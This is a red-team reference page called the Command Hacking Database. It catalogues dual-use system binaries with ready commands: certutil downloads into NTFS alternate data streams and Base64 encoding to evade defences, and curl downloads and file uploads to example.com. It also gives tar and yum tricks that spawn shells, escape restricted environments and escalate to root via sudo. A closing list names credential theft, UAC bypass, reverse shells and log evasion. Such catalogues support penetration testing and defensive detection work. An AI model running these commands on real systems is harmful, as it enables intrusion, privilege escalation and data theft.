Command Hacking Database (CHDB)

The goal of the CHDB project is to document every binary, script, and library that can be helpful for penetration testing
(Red Team).

id	OS	Command	Privileges	Function	Protocol	type	Notes
id	OS	Command	Privileges	Function	Protocol	type	Notes
1	Windows	certutil.exe	User	Download, ADS, Encode, Decode	HTTP, HTTPS	binary	Download certutil.exe -urlcache -split -f http://example.com/file_name file_name Download file and save it in an NTFS Alternate Data Stream (ADS) certutil.exe -urlcache -split -f http://example.com/file_name.ps1 c:temp:file_name Test: powershell -ep bypass - < c:temp:file_name Find: dir /s /r \| find ":$DATA" Encode (Base64) files to evade defensive measures certutil -encode InputFileName EncodedOutputFileName Decode (Base64) file certutil -decode File_Encoded File_Decoded Description certutil - dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains. Path C:WindowsSystem32certutil.exe, C:\WindowsSysWOW64certutil.exe Protocol HTTP, HTTPS OS-Version 7, 8, 10
2	Windows	curl	User	Download, Upload	HTTP, HTTPS, FILE, FTP, FTPS, SCP, SFTP, SMB, SMBS, TFTP, IMAP, IMAPS, LDAP, LDAPS, POP3, POP3S, RTMP, RTSP, SMTP, SMTPS, TELNET, GOPHER	binary	Download curl http://example.com/file_name -o file_name Upload curl -F 'file=@file_to_send' http://example.com/upload/ Description curl - is a tool to transfer data from or to a server. Path C:WindowsSystem32curl.exe Protocol HTTP, HTTPS, FILE, FTP, FTPS, SCP, SFTP, SMB, SMBS, TFTP, IMAP, IMAPS, LDAP, LDAPS, POP3, POP3S, RTMP, RTSP, SMTP, SMTPS, TELNET, GOPHER OS-Version 10
3	Linux	curl	User	Download, Upload	HTTP, HTTPS, FILE, FTP, FTPS, SCP, SFTP, SMB, SMBS, TFTP, IMAP, IMAPS, LDAP, LDAPS, POP3, POP3S, RTMP, RTSP, SMTP, SMTPS, TELNET, GOPHER	binary	Download curl http://example.com/file_name -o file_name Upload curl -F 'file=@file_to_send' http://example.com/upload/ Description curl - is a tool to transfer data from or to a server. Path /usr/bin/curl, /usr/local/bin/curl Protocol HTTP, HTTPS, FILE, FTP, FTPS, SCP, SFTP, SMB, SMBS, TFTP, IMAP, IMAPS, LDAP, LDAPS, POP3, POP3S, RTMP, RTSP, SMTP, SMTPS, TELNET, GOPHER OS-Version -
4	Linux	tar	User, Sudo	Shell, Download, Upload, Read, Write, Sudo	SSH	Binary	Shell Break out from restricted environments tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh tar xf /dev/null -I '/bin/sh -c "sh <&2 1>&2"' (GNU tar only) Download Download and extract a tar archive via SSH (GNU tar only). RHOST=example.com RUSER=root RFILE=/tmp/file_to_get.tar tar xvf $RUSER@$RHOST:$RFILE --rsh-command=/bin/ssh Upload Create tar archive and send it via SSH to a remote location (GNU tar only). RHOST=example.com RUSER=root RFILE=/tmp/file_to_send.tar LFILE=file_to_send tar cvf $RUSER@$RHOST:$RFILE $LFILE --rsh-command=/bin/ssh * rmt utility is required on the attacker box for download or upload (rmt provides remote access to files and devices for tar). Read It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system (GNU tar only). LFILE=file_to_read tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"' Write It writes data to files, it may be used to do privileged writes or write files outside a restricted file system (GNU tar only). LFILE=file_to_write TF=$(mktemp) echo DATA > "$TF" tar c --xform "s@.@$LFILE@" -OP "$TF" \| tar x -P Sudo* If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access. sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh Description tar - an archiving utility Path /bin/tar, /usr/local/bin/tar Protocol SSH OS-Version -
5	Linux	yum	User, Sudo	Shell, Download, Sudo	HTTP, HTTPS	Binary	Download yum install http://example.com/file_to_get.rpm Sudo Spawn interactive root shell by loading a custom plugin. TF=$(mktemp -d) cat >$TF/x<<EOF [main] plugins=1 pluginpath=$TF pluginconfpath=$TF EOF cat >$TF/y.conf<<EOF [main] enabled=1 EOF cat >$TF/y.py<<EOF import os import yum from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE requires_api_version='2.1' def init_hook(conduit): os.execl('/bin/sh','/bin/sh') EOF sudo yum -c $TF/x --enableplugin=y Description yum - Yellowdog Updater Modified Path /usr/bin/yum Protocol HTTP, HTTPS OS-Version -

Windows

Microsoft-signed (native to the OS or downloaded from Microsoft).
Executing code (Arbitrary code, Pass-through execution of other programs (unsigned) or scripts)
File operations (Download, Upload, Copy, Encode, Decode, …)
User Account Control (UAC) Bypass
Credential theft
Log Evasion & Obfuscation
DLL Sideloading and Hijacking
Dumping process memory
Compiling code

Linux

Break Out (restricted shells)
Reverse Shells
Privilege Escalation (SUID, SGID, Sticky Bits)
File operations (Download, Upload, Copy, Encode, Decode, …)
Facilitate the other post-exploitation tasks
Log Evasion & Obfuscation
Dumping process memory
Compiling code

Disclaimer

Use this only for research purposes and ethical hacking, do not break any laws by exploiting weaknesses of companies!